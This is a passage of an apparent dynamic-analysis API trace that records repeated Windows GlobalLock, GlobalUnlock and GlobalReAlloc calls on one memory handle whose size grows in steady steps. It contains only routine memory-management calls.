returned 0x6ba0020 [0031.090] GlobalHandle (pMem=0x6ba0020) returned 0xb40084 [0031.090] GlobalUnlock (hMem=0xb40084) returned 0 [0031.090] GlobalReAlloc (hMem=0xb40084, dwBytes=0xdc000, uFlags=0x2) returned 0xb40084 [0031.106] GlobalLock (hMem=0xb40084) returned 0x6c80020 [0031.108] GlobalHandle (pMem=0x6c80020) returned 0xb40084 [0031.108] GlobalUnlock (hMem=0xb40084) returned 0 [0031.108] GlobalReAlloc (hMem=0xb40084, dwBytes=0xde000, uFlags=0x2) returned 0xb40084 [0031.125] GlobalLock (hMem=0xb40084) returned 0x6ba0020 [0031.126] GlobalHandle (pMem=0x6ba0020) returned 0xb40084 [0031.126] GlobalUnlock (hMem=0xb40084) returned 0 [0031.126] GlobalReAlloc (hMem=0xb40084, dwBytes=0xe0000, uFlags=0x2) returned 0xb40084 [0031.143] GlobalLock (hMem=0xb40084) returned 0x6c80020 [0031.144] GlobalHandle (pMem=0x6c80020) returned 0xb40084 [0031.144] GlobalUnlock (hMem=0xb40084) returned 0 [0031.145] GlobalReAlloc (hMem=0xb40084, dwBytes=0xe2000, uFlags=0x2) returned 0xb40084 [0031.162] GlobalLock (hMem=0xb40084) returned 0x6d70020 [0031.163] GlobalHandle (pMem=0x6d70020) returned 0xb40084 [0031.163] GlobalUnlock (hMem=0xb40084) returned 0 [0031.163] GlobalReAlloc (hMem=0xb40084, dwBytes=0xe4000, uFlags=0x2) returned 0xb40084 [0031.182] GlobalLock (hMem=0xb40084) returned 0x6ba0020 [0031.183] GlobalHandle (pMem=0x6ba0020) returned 0xb40084 [0031.183] GlobalUnlock (hMem=0xb40084) returned 0 [0031.183] GlobalReAlloc (hMem=0xb40084, dwBytes=0xe6000, uFlags=0x2) returned 0xb40084 [0031.201] GlobalLock (hMem=0xb40084) returned 0x6c90020 [0031.202] GlobalHandle (pMem=0x6c90020) returned 0xb40084 [0031.202] GlobalUnlock (hMem=0xb40084) returned 0 [0031.202] GlobalReAlloc (hMem=0xb40084, dwBytes=0xe8000, uFlags=0x2) returned 0xb40084 [0031.220] GlobalLock (hMem=0xb40084) returned 0x6ba0020 [0031.221] GlobalHandle (pMem=0x6ba0020) returned 0xb40084 [0031.222] GlobalUnlock (hMem=0xb40084) returned 0 [0031.222] GlobalReAlloc (hMem=0xb40084, dwBytes=0xea000, uFlags=0x2) returned 0xb40084 [0031.240] GlobalLock (hMem=0xb40084) returned 0x6c90020 [0031.241] GlobalHandle (pMem=0x6c90020) returned 0xb40084 [0031.241] GlobalUnlock (hMem=0xb40084) returned 0 [0031.241] GlobalReAlloc (hMem=0xb40084, dwBytes=0xec000, uFlags=0x2) returned 0xb40084 [0031.259] GlobalLock (hMem=0xb40084) returned 0x6ba0020 [0031.260] GlobalHandle (pMem=0x6ba0020) returned 0xb40084 [0031.260] GlobalUnlock (hMem=0xb40084) returned 0 [0031.260] GlobalReAlloc (hMem=0xb40084, dwBytes=0xee000, uFlags=0x2) returned 0xb40084 [0031.278] GlobalLock (hMem=0xb40084) returned 0x6c90020 [0031.279] GlobalHandle (pMem=0x6c90020) returned 0xb40084 [0031.279] GlobalUnlock (hMem=0xb40084) returned 0 [0031.279] GlobalReAlloc (hMem=0xb40084, dwBytes=0xf0000, uFlags=0x2) returned 0xb40084 [0031.298] GlobalLock (hMem=0xb40084) returned 0x6d80020 [0031.299] GlobalHandle (pMem=0x6d80020) returned 0xb40084 [0031.299] GlobalUnlock (hMem=0xb40084) returned 0 [0031.299] GlobalReAlloc (hMem=0xb40084, dwBytes=0xf2000, uFlags=0x2) returned 0xb40084 [0031.318] GlobalLock (hMem=0xb40084) returned 0x6ba0020 [0031.319] GlobalHandle (pMem=0x6ba0020) returned 0xb40084 [0031.319] GlobalUnlock (hMem=0xb40084) returned 0 [0031.319] GlobalReAlloc (hMem=0xb40084, dwBytes=0xf4000, uFlags=0x2) returned 0xb40084 [0031.338] GlobalLock (hMem=0xb40084) returned 0x6ca0020 [0031.339] GlobalHandle (pMem=0x6ca0020) returned 0xb40084 [0031.339] GlobalUnlock (hMem=0xb40084) returned 0 [0031.339] GlobalReAlloc (hMem=0xb40084, dwBytes=0xf6000, uFlags=0x2) returned 0xb40084 [0031.358] GlobalLock (hMem=0xb40084) returned 0x6ba0020 [0031.360] GlobalHandle (pMem=0x6ba0020) returned 0xb40084 [0031.360] GlobalUnlock (hMem=0xb40084) returned 0 [0031.360] GlobalReAlloc (hMem=0xb40084, dwBytes=0xf8000, uFlags=0x2) returned 0xb40084 [0031.378] GlobalLock (hMem=0xb40084) returned 0x6ca0020 [0031.379] GlobalHandle (pMem=0x6ca0020) returned 0xb40084 [0031.379] GlobalUnlock (hMem=0xb40084) returned 0 [0031.379] GlobalReAlloc (hMem=0xb40084, dwBytes=0xfa000, uFlags=0x2) returned 0xb40084 [0031.399] GlobalLock (hMem=0xb40084) returned 0x6ba0020 [0031.400] GlobalHandle (pMem=0x6ba0020) returned 0xb40084 [0031.400] GlobalUnlock (hMem=0xb40084) returned 0 [0031.400] GlobalReAlloc (hMem=0xb40084, dwBytes=0xfc000, uFlags=0x2) returned 0xb40084 [0031.420] GlobalLock (hMem=0xb40084) returned 0x6ca0020 [0031.421] GlobalHandle (pMem=0x6ca0020) returned 0xb40084 [0031.421] GlobalUnlock (hMem=0xb40084) returned 0 [0031.421] GlobalReAlloc (hMem=0xb40084, dwBytes=0xfe000, uFlags=0x2) returned 0xb40084 [0031.440] GlobalLock (hMem=0xb40084) returned 0x6ba0020 [0031.441] GlobalHandle (pMem=0x6ba0020) returned 0xb40084 [0031.441] GlobalUnlock (hMem=0xb40084) returned 0 [0031.441] GlobalReAlloc (hMem=0xb40084, dwBytes=0x100000, uFlags=0x2) returned 0xb40084 [0031.461] GlobalLock (hMem=0xb40084) returned 0x6ca0020 [0031.462] GlobalHandle (pMem=0x6ca0020) returned 0xb40084 [0031.463] GlobalUnlock (hMem=0xb40084) returned 0 [0031.463] GlobalReAlloc (hMem=0xb40084, dwBytes=0x102000, uFlags=0x2) returned 0xb40084 [0031.482] GlobalLock (hMem=0xb40084) returned 0x6db0020 [0031.484] GlobalHandle (pMem=0x6db0020) returned 0xb40084 [0031.484] GlobalUnlock (hMem=0xb40084) returned 0 [0031.484] GlobalReAlloc (hMem=0xb40084, dwBytes=0x104000, uFlags=0x2) returned 0xb40084 [0031.503] GlobalLock (hMem=0xb40084) returned 0x6ba0020 [0031.504] GlobalHandle (pMem=0x6ba0020) returned 0xb40084 [0031.504] GlobalUnlock (hMem=0xb40084) returned 0 [0031.504] GlobalReAlloc (hMem=0xb40084, dwBytes=0x106000, uFlags=0x2) returned 0xb40084 [0031.525] GlobalLock (hMem=0xb40084) returned 0x6cb0020 [0031.526] GlobalHandle (pMem=0x6cb0020) returned 0xb40084 [0031.526] GlobalUnlock (hMem=0xb40084) returned 0 [0031.526] GlobalReAlloc (hMem=0xb40084, dwBytes=0x108000, uFlags=0x2) returned 0xb40084 [0031.546] GlobalLock (hMem=0xb40084) returned 0x6ba0020 [0031.548] GlobalHandle (pMem=0x6ba0020) returned 0xb40084 [0031.548] GlobalUnlock (hMem=0xb40084) returned 0 [0031.548] GlobalReAlloc (hMem=0xb40084, dwBytes=0x10a000, uFlags=0x2) returned 0xb40084 [0031.568] GlobalLock (hMem=0xb40084) returned 0x6cb0020 [0031.569] GlobalHandle (pMem=0x6cb0020) returned 0xb40084 [0031.569] GlobalUnlock (hMem=0xb40084) returned 0 [0031.569] GlobalReAlloc (hMem=0xb40084, dwBytes=0x10c000, uFlags=0x2) returned 0xb40084 [0031.594] GlobalLock (hMem=0xb40084) returned 0x6ba0020 [0031.595] GlobalHandle (pMem=0x6ba0020) returned 0xb40084 [0031.595] GlobalUnlock (hMem=0xb40084) returned 0 [0031.595] GlobalReAlloc (hMem=0xb40084, dwBytes=0x10e000, uFlags=0x2) returned 0xb40084 [0031.616] GlobalLock (hMem=0xb40084) returned 0x6cb0020 [0031.617] GlobalHandle (pMem=0x6cb0020) returned 0xb40084 [0031.618] GlobalUnlock (hMem=0xb40084) returned 0 [0031.618] GlobalReAlloc (hMem=0xb40084, dwBytes=0x110000, uFlags=0x2) returned 0xb40084 [0031.639] GlobalLock (hMem=0xb40084) returned 0x6dc0020 [0031.640] GlobalHandle (pMem=0x6dc0020) returned 0xb40084 [0031.640] GlobalUnlock (hMem=0xb40084) returned 0 [0031.640] GlobalReAlloc (hMem=0xb40084, dwBytes=0x112000, uFlags=0x2) returned 0xb40084 [0031.661] GlobalLock (hMem=0xb40084) returned 0x6ba0020 [0031.662] GlobalHandle (pMem=0x6ba0020) returned 0xb40084 [0031.662] GlobalUnlock (hMem=0xb40084) returned 0 [0031.662] GlobalReAlloc (hMem=0xb40084, dwBytes=0x114000, uFlags=0x2) returned 0xb40084 [0031.684] GlobalLock (hMem=0xb40084) returned 0x6cc0020 [0031.685] GlobalHandle (pMem=0x6cc0020) returned 0xb40084 [0031.685] GlobalUnlock (hMem=0xb40084) returned 0 [0031.685] GlobalReAlloc (hMem=0xb40084, dwBytes=0x116000, uFlags=0x2) returned 0xb40084 [0031.706] GlobalLock (hMem=0xb40084) returned 0x6ba0020 [0031.707] GlobalHandle (pMem=0x6ba0020) returned 0xb40084 [0031.707] GlobalUnlock (hMem=0xb40084) returned 0 [0031.707] GlobalReAlloc (hMem=0xb40084, dwBytes=0x118000, uFlags=0x2) returned 0xb40084 [0031.730] GlobalLock (hMem=0xb40084) returned 0x6cc0020 [0031.731] GlobalHandle (pMem=0x6cc0020) returned 0xb40084 [0031.731] GlobalUnlock (hMem=0xb40084) returned 0 [0031.731] GlobalReAlloc (hMem=0xb40084, dwBytes=0x11a000, uFlags=0x2) returned 0xb40084 [0031.753] GlobalLock (hMem=0xb40084) returned 0x6ba0020 [0031.754] GlobalHandle (pMem=0x6ba0020) returned 0xb40084 [0031.754] GlobalUnlock (hMem=0xb40084) returned 0 [0031.754] GlobalReAlloc (hMem=0xb40084, dwBytes=0x11c000, uFlags=0x2) returned 0xb40084 [0031.776] GlobalLock (hMem=0xb40084) returned 0x6cc0020 [0031.777] GlobalHandle (pMem=0x6cc0020) returned 0xb40084 [0031.777] GlobalUnlock (hMem=0xb40084) returned 0 [0031.777] GlobalReAlloc (hMem=0xb40084, dwBytes=0x11e000, uFlags=0x2) returned 0xb40084 [0031.800] GlobalLock (hMem=0xb40084) returned 0x6ba0020 [0031.801] GlobalHandle (pMem=0x6ba0020) returned 0xb40084 [0031.801] GlobalUnlock (hMem=0xb40084) returned 0 [0031.801] GlobalReAlloc (hMem=0xb40084, dwBytes=0x120000, uFlags=0x2) returned 0xb40084 [0031.823] GlobalLock (hMem=0xb40084) returned 0x6cc0020 [0031.824] GlobalHandle (pMem=0x6cc0020) returned 0xb40084 [0031.824] GlobalUnlock (hMem=0xb40084) returned 0 [0031.824] GlobalReAlloc (hMem=0xb40084, dwBytes=0x122000, uFlags=0x2) returned 0xb40084 [0031.849] GlobalLock (hMem=0xb40084) returned 0x6df0020 [0031.850] GlobalHandle (pMem=0x6df0020) returned 0xb40084 [0031.850] GlobalUnlock (hMem=0xb40084) returned 0 [0031.850] GlobalReAlloc (hMem=0xb40084, dwBytes=0x124000, uFlags=0x2) returned 0xb40084 [0031.872] GlobalLock (hMem=0xb40084) returned 0x6ba0020 [0031.874] GlobalHandle (pMem=0x6ba0020) returned 0xb40084 [0031.874] GlobalUnlock (hMem=0xb40084) returned 0 [0031.874] GlobalReAlloc (hMem=0xb40084, dwBytes=0x126000, uFlags=0x2) returned 0xb40084 [0031.897] GlobalLock (hMem=0xb40084) returned 0x6cd0020 [0031.898] GlobalHandle (pMem=0x6cd0020) returned 0xb40084 [0031.898] GlobalUnlock (hMem=0xb40084) returned 0 [0031.898] GlobalReAlloc (hMem=0xb40084, dwBytes=0x128000, uFlags=0x2) returned 0xb40084 [0031.920] GlobalLock (hMem=0xb40084) returned 0x6ba0020 [0031.922] GlobalHandle (pMem=0x6ba0020) returned 0xb40084 [0031.922] GlobalUnlock (hMem=0xb40084) returned 0 [0031.922] GlobalReAlloc (hMem=0xb40084, dwBytes=0x12a000, uFlags=0x2) returned 0xb40084 [0031.946] GlobalLock (hMem=0xb40084) returned 0x6cd0020 [0031.948] GlobalHandle (pMem=0x6cd0020) returned 0xb40084 [0031.948] GlobalUnlock (hMem=0xb40084) returned 0 [0031.948] GlobalReAlloc (hMem=0xb40084, dwBytes=0x12c000, uFlags=0x2) returned 0xb40084 [0031.971] GlobalLock (hMem=0xb40084) returned 0x6ba0020 [0031.972] GlobalHandle (pMem=0x6ba0020) returned 0xb40084 [0031.972] GlobalUnlock (hMem=0xb40084) returned 0 [0031.972] GlobalReAlloc (hMem=0xb40084, dwBytes=0x12e000, uFlags=0x2) returned 0xb40084 [0031.994] GlobalLock (hMem=0xb40084) returned 0x6cd0020 [0031.995] GlobalHandle (pMem=0x6cd0020) returned 0xb40084 [0031.995] GlobalUnlock (hMem=0xb40084) returned 0 [0031.995] GlobalReAlloc (hMem=0xb40084, dwBytes=0x130000, uFlags=0x2) returned 0xb40084 [0032.018] GlobalLock (hMem=0xb40084) returned 0x6e00020 [0032.019] GlobalHandle (pMem=0x6e00020) returned 0xb40084 [0032.019] GlobalUnlock (hMem=0xb40084) returned 0 [0032.019] GlobalReAlloc (hMem=0xb40084, dwBytes=0x132000, uFlags=0x2) returned 0xb40084 [0032.043] GlobalLock (hMem=0xb40084) returned 0x6ba0020 [0032.044] GlobalHandle (pMem=0x6ba0020) returned 0xb40084 [0032.044] GlobalUnlock (hMem=0xb40084) returned 0 [0032.044] GlobalReAlloc (hMem=0xb40084, dwBytes=0x134000, uFlags=0x2) returned 0xb40084 [0032.072] GlobalLock (hMem=0xb40084) returned 0x6ce0020 [0032.073] GlobalHandle (pMem=0x6ce0020) returned 0xb40084 [0032.073] GlobalUnlock (hMem=0xb40084) returned 0 [0032.073] GlobalReAlloc (hMem=0xb40084, dwBytes=0x136000, uFlags=0x2) returned 0xb40084 [0032.097] GlobalLock (hMem=0xb40084) returned 0x6ba0020 [0032.098] GlobalHandle (pMem=0x6ba0020) returned 0xb40084 [0032.098] GlobalUnlock (hMem=0xb40084) returned 0 [0032.098] GlobalReAlloc (hMem=0xb40084, dwBytes=0x138000, uFlags=0x2) returned 0xb40084 [0032.122] GlobalLock (hMem=0xb40084) returned 0x6ce0020 [0032.123] GlobalHandle (pMem=0x6ce0020) returned 0xb40084 [0032.123] GlobalUnlock (hMem=0xb40084) returned 0 [0032.123] GlobalReAlloc (hMem=0xb40084, dwBytes=0x13a000, uFlags=0x2) returned 0xb40084 [0032.157] GlobalLock (hMem=0xb40084) returned 0x6ba0020 [0032.158] GlobalHandle (pMem=0x6ba0020) returned 0xb40084 [0032.158] GlobalUnlock (hMem=0xb40084) returned 0 [0032.158] GlobalReAlloc (hMem=0xb40084, dwBytes=0x13c000, uFlags=0x2) returned 0xb40084 [0032.183] GlobalLock (hMem=0xb40084) returned 0x6ce0020 [0032.184] GlobalHandle (pMem=0x6ce0020) returned 0xb40084 [0032.184] GlobalUnlock (hMem=0xb40084) returned 0 [0032.184] GlobalReAlloc (hMem=0xb40084, dwBytes=0x13e000, uFlags=0x2) returned 0xb40084 [0032.208] GlobalLock (hMem=0xb40084) returned 0x6ba0020 [0032.209] GlobalHandle (pMem=0x6ba0020) returned 0xb40084 [0032.209] GlobalUnlock (hMem=0xb40084) returned 0 [0032.209] GlobalReAlloc (hMem=0xb40084, dwBytes=0x140000, uFlags=0x2) returned 0xb40084 [0032.233] GlobalLock (hMem=0xb40084) returned 0x6ce0020 [0032.234] GlobalHandle (pMem=0x6ce0020) returned 0xb40084 [0032.234] GlobalUnlock (hMem=0xb40084) returned 0 [0032.235] GlobalReAlloc (hMem=0xb40084, dwBytes=0x142000, uFlags=0x2) returned 0xb40084 [0032.259] GlobalLock (hMem=0xb40084) returned 0x6e30020 [0032.260] GlobalHandle (pMem=0x6e30020) returned 0xb40084 [0032.260] GlobalUnlock (hMem=0xb40084) returned 0 [0032.260] GlobalReAlloc (hMem=0xb40084, dwBytes=0x144000, uFlags=0x2) returned 0xb40084 [0032.284] GlobalLock (hMem=0xb40084) returned 0x6ba0020 [0032.286] GlobalHandle (pMem=0x6ba0020) returned 0xb40084 [0032.286] GlobalUnlock (hMem=0xb40084) returned 0 [0032.286] GlobalReAlloc (hMem=0xb40084, dwBytes=0x146000, uFlags=0x2) returned 0xb40084 [0032.311] GlobalLock (hMem=0xb40084) returned 0x6cf0020 [0032.312] GlobalHandle (pMem=0x6cf0020) returned 0xb40084 [0032.312] GlobalUnlock (hMem=0xb40084) returned 0 [0032.312] GlobalReAlloc (hMem=0xb40084, dwBytes=0x148000, uFlags=0x2) returned 0xb40084 [0032.337] GlobalLock (hMem=0xb40084) returned 0x6ba0020 [0032.338] GlobalHandle (pMem=0x6ba0020) returned 0xb40084 [0032.338] GlobalUnlock (hMem=0xb40084) returned 0 [0032.338] GlobalReAlloc (hMem=0xb40084, dwBytes=0x14a000, uFlags=0x2) returned 0xb40084 [0032.362] GlobalLock (hMem=0xb40084) returned 0x6cf0020 [0032.363] GlobalHandle (pMem=0x6cf0020) returned 0xb40084 [0032.363] GlobalUnlock (hMem=0xb40084) returned 0 [0032.363] GlobalReAlloc (hMem=0xb40084, dwBytes=0x14c000, uFlags=0x2) returned 0xb40084 [0032.389] GlobalLock (hMem=0xb40084) returned 0x6ba0020 [0032.390] GlobalHandle (pMem=0x6ba0020) returned 0xb40084 [0032.390] GlobalUnlock (hMem=0xb40084) returned 0 [0032.390] GlobalReAlloc (hMem=0xb40084, dwBytes=0x14e000, uFlags=0x2) returned 0xb40084 [0032.426] GlobalLock (hMem=0xb40084) returned 0x6cf0020 [0032.427] GlobalHandle (pMem=0x6cf0020) returned 0xb40084 [0032.427] GlobalUnlock (hMem=0xb40084) returned 0 [0032.427] GlobalReAlloc (hMem=0xb40084, dwBytes=0x150000, uFlags=0x2) returned 0xb40084 [0032.452] GlobalLock (hMem=0xb40084) returned 0x6e40020 [0032.453] GlobalHandle (pMem=0x6e40020) returned 0xb40084 [0032.453] GlobalUnlock (hMem=0xb40084) returned 0 [0032.453] GlobalReAlloc (hMem=0xb40084, dwBytes=0x152000, uFlags=0x2) returned 0xb40084 [0032.479] GlobalLock (hMem=0xb40084) returned 0x6ba0020 [0032.480] GlobalHandle (pMem=0x6ba0020) returned 0xb40084 [0032.480] GlobalUnlock (hMem=0xb40084) returned 0 [0032.480] GlobalReAlloc (hMem=0xb40084, dwBytes=0x154000, uFlags=0x2) returned 0xb40084 [0032.506] GlobalLock (hMem=0xb40084) returned 0x6d00020 [0032.507] GlobalHandle (pMem=0x6d00020) returned 0xb40084 [0032.507] GlobalUnlock (hMem=0xb40084) returned 0 [0032.507] GlobalReAlloc (hMem=0xb40084, dwBytes=0x156000, uFlags=0x2) returned 0xb40084 [0032.533] GlobalLock (hMem=0xb40084) returned 0x6ba0020 [0032.534] GlobalHandle (pMem=0x6ba0020) returned 0xb40084 [0032.534] GlobalUnlock (hMem=0xb40084) returned 0 [0032.535] GlobalReAlloc (hMem=0xb40084, dwBytes=0x158000, uFlags=0x2) returned 0xb40084 [0032.560] GlobalLock (hMem=0xb40084) returned 0x6d00020 [0032.561] GlobalHandle (pMem=0x6d00020) returned 0xb40084 [0032.562] GlobalUnlock (hMem=0xb40084) returned 0 [0032.562] GlobalReAlloc (hMem=0xb40084, dwBytes=0x15a000, uFlags=0x2) returned 0xb40084 [0032.591] GlobalLock (hMem=0xb40084) returned 0x6ba0020 [0032.592] GlobalHandle (pMem=0x6ba0020) returned 0xb40084 [0032.592] GlobalUnlock (hMem=0xb40084) returned 0 [0032.592] GlobalReAlloc (hMem=0xb40084, dwBytes=0x15c000, uFlags=0x2) returned 0xb40084 [0032.619] GlobalLock (hMem=0xb40084) returned 0x6d00020 [0032.620] GlobalHandle (pMem=0x6d00020) returned 0xb40084 [0032.620] GlobalUnlock (hMem=0xb40084) returned 0 [0032.620] GlobalReAlloc (hMem=0xb40084, dwBytes=0x15e000, uFlags=0x2) returned 0xb40084 [0032.647] GlobalLock (hMem=0xb40084) returned 0x6ba0020 [0032.648] GlobalHandle (pMem=0x6ba0020) returned 0xb40084 [0032.648] GlobalUnlock (hMem=0xb40084) returned 0 [0032.648] GlobalReAlloc (hMem=0xb40084, dwBytes=0x160000, uFlags=0x2) returned 0xb40084 [0032.675] GlobalLock (hMem=0xb40084) returned 0x6d00020 [0032.676] GlobalHandle (pMem=0x6d00020) returned 0xb40084 [0032.676] GlobalUnlock (hMem=0xb40084) returned 0 [0032.676] GlobalReAlloc (hMem=0xb40084, dwBytes=0x162000, uFlags=0x2) returned 0xb40084 [0032.703] GlobalLock (hMem=0xb40084) returned 0x6e70020 [0032.704] GlobalHandle (pMem=0x6e70020) returned 0xb40084 [0032.704] GlobalUnlock (hMem=0xb40084) returned 0 [0032.704] GlobalReAlloc (hMem=0xb40084, dwBytes=0x164000, uFlags=0x2) returned 0xb40084 [0032.732] GlobalLock (hMem=0xb40084) returned 0x6ba0020 [0032.733] GlobalHandle (pMem=0x6ba0020) returned 0xb40084 [0032.733] GlobalUnlock (hMem=0xb40084) returned 0 [0032.733] GlobalReAlloc (hMem=0xb40084, dwBytes=0x166000, uFlags=0x2) returned 0xb40084 [0032.760] GlobalLock (hMem=0xb40084) returned 0x6d10020 [0032.761] GlobalHandle (pMem=0x6d10020) returned 0xb40084 [0032.762] GlobalUnlock (hMem=0xb40084) returned 0 [0032.762] GlobalReAlloc (hMem=0xb40084, dwBytes=0x168000, uFlags=0x2) returned 0xb40084 [0032.789] GlobalLock (hMem=0xb40084) returned 0x6ba0020 [0032.791] GlobalHandle (pMem=0x6ba0020) returned 0xb40084 [0032.791] GlobalUnlock (hMem=0xb40084) returned 0 [0032.791] GlobalReAlloc (hMem=0xb40084, dwBytes=0x16a000, uFlags=0x2) returned 0xb40084 [0032.818] GlobalLock (hMem=0xb40084) returned 0x6d10020 [0032.819] GlobalHandle (pMem=0x6d10020) returned 0xb40084 [0032.819] GlobalUnlock (hMem=0xb40084) returned 0 [0032.819] GlobalReAlloc (hMem=0xb40084, dwBytes=0x16c000, uFlags=0x2) returned 0xb40084 [0032.847] GlobalLock (hMem=0xb40084) returned 0x6ba0020 [0032.848] GlobalHandle (pMem=0x6ba0020) returned 0xb40084 [0032.848] GlobalUnlock (hMem=0xb40084) returned 0 [0032.848] GlobalReAlloc (hMem=0xb40084, dwBytes=0x16e000, uFlags=0x2) returned 0xb40084 [0032.876] GlobalLock (hMem=0xb40084) returned 0x6d10020 [0032.877] GlobalHandle (pMem=0x6d10020) returned 0xb40084 [0032.877] GlobalUnlock (hMem=0xb40084) returned 0 [0032.877] GlobalReAlloc (hMem=0xb40084, dwBytes=0x170000, uFlags=0x2) returned 0xb40084 [0032.906] GlobalLock (hMem=0xb40084) returned 0x6e80020 [0032.907] GlobalHandle (pMem=0x6e80020) returned 0xb40084 [0032.907] GlobalUnlock (hMem=0xb40084) returned 0 [0032.907] GlobalReAlloc (hMem=0xb40084, dwBytes=0x172000, uFlags=0x2) returned 0xb40084 [0032.947] GlobalLock (hMem=0xb40084) returned 0x6ba0020 [0032.948] GlobalHandle (pMem=0x6ba0020) returned 0xb40084 [0032.948] GlobalUnlock (hMem=0xb40084) returned 0 [0032.948] GlobalReAlloc (hMem=0xb40084, dwBytes=0x174000, uFlags=0x2) returned 0xb40084 [0032.977] GlobalLock (hMem=0xb40084) returned 0x6d20020 [0032.978] GlobalHandle (pMem=0x6d20020) returned 0xb40084 [0032.978] GlobalUnlock (hMem=0xb40084) returned 0 [0032.978] GlobalReAlloc (hMem=0xb40084, dwBytes=0x176000, uFlags=0x2) returned 0xb40084 [0033.006] GlobalLock (hMem=0xb40084) returned 0x6ba0020 [0033.007] GlobalHandle (pMem=0x6ba0020) returned 0xb40084 [0033.007] GlobalUnlock (hMem=0xb40084) returned 0 [0033.007] GlobalReAlloc (hMem=0xb40084, dwBytes=0x178000, uFlags=0x2) returned 0xb40084 [0033.036] GlobalLock (hMem=0xb40084) returned 0x6d20020 [0033.037] GlobalHandle (pMem=0x6d20020) returned 0xb40084 [0033.037] GlobalUnlock (hMem=0xb40084) returned 0 [0033.037] GlobalReAlloc (hMem=0xb40084, dwBytes=0x17a000, uFlags=0x2) returned 0xb40084 [0033.066] GlobalLock (hMem=0xb40084) returned 0x6ba0020 [0033.067] GlobalHandle (pMem=0x6ba0020) returned 0xb40084 [0033.067] GlobalUnlock (hMem=0xb40084) returned 0 [0033.067] GlobalReAlloc (hMem=0xb40084, dwBytes=0x17c000, uFlags=0x2) returned 0xb40084 [0033.096] GlobalLock (hMem=0xb40084) returned 0x6d20020 [0033.097] GlobalHandle (pMem=0x6d20020) returned 0xb40084 [0033.097] GlobalUnlock (hMem=0xb40084) returned 0 [0033.097] GlobalReAlloc (hMem=0xb40084, dwBytes=0x17e000, uFlags=0x2) returned 0xb40084 [0033.126] GlobalLock (hMem=0xb40084) returned 0x6ba0020 [0033.127] GlobalHandle (pMem=0x6ba0020) returned 0xb40084 [0033.127] GlobalUnlock (hMem=0xb40084) returned 0 [0033.127] GlobalReAlloc (hMem=0xb40084, dwBytes=0x180000, uFlags=0x2) returned 0xb40084 [0033.156] GlobalLock (hMem=0xb40084) returned 0x6d20020 [0033.157] GlobalHandle (pMem=0x6d20020) returned 0xb40084 [0033.157] GlobalUnlock (hMem=0xb40084) returned 0 [0033.158] GlobalReAlloc (hMem=0xb40084, dwBytes=0x182000, uFlags=0x2) returned 0xb40084 [0033.187] GlobalLock (hMem=0xb40084) returned 0x6eb0020 [0033.188] GlobalHandle (pMem=0x6eb0020) returned 0xb40084 [0033.188] GlobalUnlock (hMem=0xb40084) returned 0 [0033.188] GlobalReAlloc (hMem=0xb40084, dwBytes=0x184000, uFlags=0x2) returned 0xb40084 [0033.217] GlobalLock (hMem=0xb40084) returned 0x6ba0020 [0033.218] GlobalHandle (pMem=0x6ba0020) returned 0xb40084 [0033.218] GlobalUnlock (hMem=0xb40084) returned 0 [0033.218] GlobalReAlloc (hMem=0xb40084, dwBytes=0x186000, uFlags=0x2) returned 0xb40084 [0033.247] GlobalLock (hMem=0xb40084) returned 0x6d30020 [0033.248] GlobalHandle (pMem=0x6d30020) returned 0xb40084 [0033.248] GlobalUnlock (hMem=0xb40084) returned 0 [0033.248] GlobalReAlloc (hMem=0xb40084, dwBytes=0x188000, uFlags=0x2) returned 0xb40084 [0033.288] GlobalLock (hMem=0xb40084) returned 0x6ba0020 [0033.289] GlobalHandle (pMem=0x6ba0020) returned 0xb40084 [0033.289] GlobalUnlock (hMem=0xb40084) returned 0 [0033.289] GlobalReAlloc (hMem=0xb40084, dwBytes=0x18a000, uFlags=0x2) returned 0xb40084 [0033.319] GlobalLock (hMem=0xb40084) returned 0x6d30020 [0033.320] GlobalHandle (pMem=0x6d30020) returned 0xb40084 [0033.320] GlobalUnlock (hMem=0xb40084) returned 0 [0033.320] GlobalReAlloc (hMem=0xb40084, dwBytes=0x18c000, uFlags=0x2) returned 0xb40084 [0033.351] GlobalLock (hMem=0xb40084) returned 0x6ba0020 [0033.352] GlobalHandle (pMem=0x6ba0020) returned 0xb40084 [0033.352] GlobalUnlock (hMem=0xb40084) returned 0 [0033.352] GlobalReAlloc (hMem=0xb40084, dwBytes=0x18e000, uFlags=0x2) returned 0xb40084 [0033.382] GlobalLock (hMem=0xb40084) returned 0x6d30020 [0033.383] GlobalHandle (pMem=0x6d30020) returned 0xb40084 [0033.383] GlobalUnlock (hMem=0xb40084) returned 0 [0033.383] GlobalReAlloc (hMem=0xb40084, dwBytes=0x190000, uFlags=0x2) returned 0xb40084 [0033.414] GlobalLock (hMem=0xb40084) returned 0x6ec0020 [0033.415] GlobalHandle (pMem=0x6ec0020) returned 0xb40084 [0033.415] GlobalUnlock (hMem=0xb40084) returned 0 [0033.415] GlobalReAlloc (hMem=0xb40084, dwBytes=0x192000, uFlags=0x2) returned 0xb40084 [0033.445] GlobalLock (hMem=0xb40084) returned 0x6ba0020 [0033.446] GlobalHandle (pMem=0x6ba0020) returned 0xb40084 [0033.446] GlobalUnlock (hMem=0xb40084) returned 0 [0033.446] GlobalReAlloc (hMem=0xb40084, dwBytes=0x194000, uFlags=0x2) returned 0xb40084 [0033.477] GlobalLock (hMem=0xb40084) returned 0x6d40020 [0033.478] GlobalHandle (pMem=0x6d40020) returned 0xb40084 [0033.478] GlobalUnlock (hMem=0xb40084) returned 0 [0033.478] GlobalReAlloc (hMem=0xb40084, dwBytes=0x196000, uFlags=0x2) returned 0xb40084 [0033.509] GlobalLock (hMem=0xb40084) returned 0x6ba0020 [0033.510] GlobalHandle (pMem=0x6ba0020) returned 0xb40084 [0033.510] GlobalUnlock (hMem=0xb40084) returned 0 [0033.510] GlobalReAlloc (hMem=0xb40084, dwBytes=0x198000, uFlags=0x2) returned 0xb40084 [0033.541] GlobalLock (hMem=0xb40084) returned 0x6d40020 [0033.542] GlobalHandle (pMem=0x6d40020) returned 0xb40084 [0033.542] GlobalUnlock (hMem=0xb40084) returned 0 [0033.542] GlobalReAlloc (hMem=0xb40084, dwBytes=0x19a000, uFlags=0x2) returned 0xb40084 [0033.573] GlobalLock (hMem=0xb40084) returned 0x6ba0020 [0033.574] GlobalHandle (pMem=0x6ba0020) returned 0xb40084 [0033.574] GlobalUnlock (hMem=0xb40084) returned 0 [0033.574] GlobalReAlloc (hMem=0xb40084, dwBytes=0x19c000, uFlags=0x2) returned 0xb40084 [0033.609] GlobalLock (hMem=0xb40084) returned 0x6d40020 [0033.611] GlobalHandle (pMem=0x6d40020) returned 0xb40084 [0033.611] GlobalUnlock (hMem=0xb40084) returned 0 